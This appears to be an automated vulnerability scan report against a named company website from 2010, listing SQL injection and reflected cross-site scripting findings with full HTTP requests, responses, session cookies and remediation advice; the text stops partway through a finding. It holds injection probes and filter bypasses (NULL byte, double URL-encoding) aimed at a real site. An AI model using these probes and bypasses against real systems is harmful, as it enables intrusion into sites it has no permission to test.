GET /resources/healthcheck%2527/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Article #0 not found Date: Sat, 06 Nov 2010 04:47:00 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 04:47:02 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3017
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /resources/healthcheck%2527%2527/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:47:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /resources/healthcheck/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%00' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 08:05:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/healthcheck/run-healthcheck.html HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.google.com/search?hl=en&q=%00'' Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 301 Moved Permanently Date: Sat, 06 Nov 2010 08:05:33 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Location: http://www.analyticspros.com/index.php?option=com_user&view=login&return=aHR0cDovL3d3dy5hbmFseXRpY3Nwcm9zLmNvbS9yZXNvdXJjZXMvaGVhbHRoY2hlY2svcnVuLWhlYWx0aGNoZWNrLmh0bWw= Content-Length: 0 Connection: close Content-Type: text/html
1.276. http://www.analyticspros.com/resources/healthcheck/run-healthcheck.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://www.analyticspros.com
Path:
/resources/healthcheck/run-healthcheck.html
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /resources/healthcheck/run-healthcheck.html?1%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:43:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 Connection: close Content-Type: text/html Content-Length: 76
Database Error: Unable to connect to the database:Could not connect to MySQL
Request 2
GET /resources/healthcheck/run-healthcheck.html?1%2527%2527=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/consulting.html Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 301 Moved Permanently Date: Sat, 06 Nov 2010 04:43:02 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Location: http://www.analyticspros.com/index.php?option=com_user&view=login&return=aHR0cDovL3d3dy5hbmFseXRpY3Nwcm9zLmNvbS9yZXNvdXJjZXMvaGVhbHRoY2hlY2svcnVuLWhlYWx0aGNoZWNrLmh0bWw/MSUyNyUyNz0x Content-Length: 0 Connection: close Content-Type: text/html
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /templates/apros2.0/js%2527/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 03:53:20 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 03:53:21 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /templates/apros2.0/js%2527%2527/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:53:21 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /templates/system'/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 1
HTTP/1.1 404 Component not found Date: Sat, 06 Nov 2010 03:50:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Last-Modified: Sat, 06 Nov 2010 03:50:19 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 3015
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir=" ...[SNIP]... <title>404 - Error: 404</title> ...[SNIP]...
Request 2
GET /templates/system''/ HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response 2
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:50:19 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Connection: close Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The apros2.0_tpl cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the apros2.0_tpl cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:18:32 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 07:36:17 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Content-Type: text/html Content-Length: 326
<br /> <b>Warning</b>: mysql_connect() [<a href='function.mysql-connect'>function.mysql-connect</a>]: User apros_apros already has more than 'max_user_connections' active connections in <b>/home/apro ...[SNIP]...
The ki_t cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ki_t cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the ki_t cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
2.1. http://www.analyticspros.com/blog.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 81616%2522%253e%253ca%253e968455d2c0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 81616\\\"><a>968455d2c0d in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
2.2. http://www.analyticspros.com/blog/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b9a76%2522%253e%253ca%253e735fb2c922a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b9a76\\\"><a>735fb2c922a in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/?b9a76%2522%253e%253ca%253e735fb2c922a=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 04:21:55 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 04:21:56 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 04:21:56 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 29093
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.3. http://www.analyticspros.com/blog/55-googleanalytics.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/55-googleanalytics.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5885c%2522%253e%253ca%253ee58268f4ea2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5885c\\\"><a>e58268f4ea2 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /blog/55-googleanalytics.html?5885c%2522%253e%253ca%253ee58268f4ea2=1 HTTP/1.1 Host: www.analyticspros.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me) Connection: close Referer: http://www.analyticspros.com/blog/55-googleanalytics/115-analytics-toolbar-for-dma-known-issues.html?itemid=70#comment Cookie: d4dad6935f632ac35975e3001dc7bbe8=6e73ff6bf3d01901949b4e496f8da4fb; fpssCookie=true; __utmz=26076141.1288999539.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ki_t=1288999540201%3B1288999540201%3B1288999855083%3B1%3B11; __utma=26076141.293438870.1288999539.1288999539.1288999539.1; __utmc=26076141; apros2.0_tpl=apros2.0; __utmmobile=0xade0ac5896f84b3c; __utmb=26076141.28.9.1288999622937; ki_u=44d042cd-dce6-2004-de40-3a4fd7c6011a; optimizelyBuckets=%7B%221925029%22%3A2045008%7D; optimizelyEndUserId=oeu1288999536936r0.7062593474984169;
Response
HTTP/1.1 200 OK Date: Sat, 06 Nov 2010 03:27:23 GMT Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.14 P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM" Expires: Mon, 1 Jan 2001 00:00:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: apros2.0_tpl=apros2.0; expires=Thu, 27-Oct-2011 03:27:24 GMT; path=/ Last-Modified: Sat, 06 Nov 2010 03:27:24 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 28811
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
2.4. http://www.analyticspros.com/blog/62-urchin.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.analyticspros.com
Path:
/blog/62-urchin.html
Issue detail
